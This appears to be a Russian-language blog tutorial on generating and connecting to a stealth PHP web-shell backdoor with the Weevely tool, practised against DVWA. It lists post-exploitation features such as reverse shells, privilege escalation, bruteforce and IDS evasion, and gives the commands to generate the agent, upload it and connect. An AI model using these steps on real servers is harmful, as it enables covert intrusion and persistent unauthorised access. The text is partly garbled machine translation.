Сегодня мы собираемся создать простой PHP шелл и бэкдор с помощью Weevely.
Weevely – это веб-оболочка командной строки, динамически расширяемая по сети во время выполнения, предназначенная для удаленного администрирования сервера и тестирования на проникновение.
Его терминал выполняет произвольный удаленный код через небольшой PHP-агент footprint, который находится на HTTP-сервере.
Более 30 модулей формируют адаптивное веб-администрирование и пост-эксплуатационный бэкдор для обслуживания доступа, эскалации привилегий и сетевых изменений даже в ограниченной среде.
Веб-оболочка Weevely php stealth и бэкдор имеют более 30 модулей, доступных для пост-эксплуатационных задач.
Основные возможности
- Ssh-подобный терминал
- Консоль SQL, повернутая на цели
- Прокси-сервер HTTP
- Аудит безопасности конфигурации хоста
- Монтирование удаленной файловой системы
- Сканирование сети развернуто по цели
- Загрузка и скачивание файлов
- Реверсивная и прямая оболочка TCP
- Поддержка Meterpreter
- Учетная запись службы bruteforce
- Управление сжатым архивом
Weevely php прячет вэб шелл и бэкдор, каждая связь между сервером и клиентом скрыта в HTTP Cookies.
Связь между клиентом и сервером обфускцируется, чтобы обходить обнаружение по сигнатурам IDS.
- Weevely https://github.com/epinna/weevely3
- Веб-сервер (я использую DVWA)
Создание бэкдор-агента
Клиент Weevely связывается с агентом PHP, установленным на цели.
Перейдите в папку weevely3/и запустите ./weevely.py, чтобы посмотреть справку или просто просто печатать в своем терминале.
# weevely [+] weevely 3.2.0 [!] Error: too few arguments [+] Run terminal to the target weevely <URL> <password> [cmd] [+] Load session file weevely session <path> [cmd] [+] Generate backdoor agent weevely generate <password> <path>
Чтобы создать новый агент, просто используйте параметр generate, передающий аргументы пароля и пути.
# weevely generate 123 /root/Desktop/backdoor.php Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1439 byte size.
Затем загрузите сгенерированный агент в целевую веб-папку.
Убедитесь, что PHP-скрипт агента правильно отображается и выполняется через веб-сервер.
Подключение к агенту
Запустите weevely script для подключения к удаленному агенту.</span></span> # weevely http: //localhost/backdoor.php 123 weevely<
Первая строка weevely> по-прежнему не подключено, чтобы пользователи могли установить любую полезную опцию предварительного подключения, например. установите прокси-серверы, которые будут использоваться.
Запуск реальной команды автоматически запускает сеанс на удаленной цели.
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.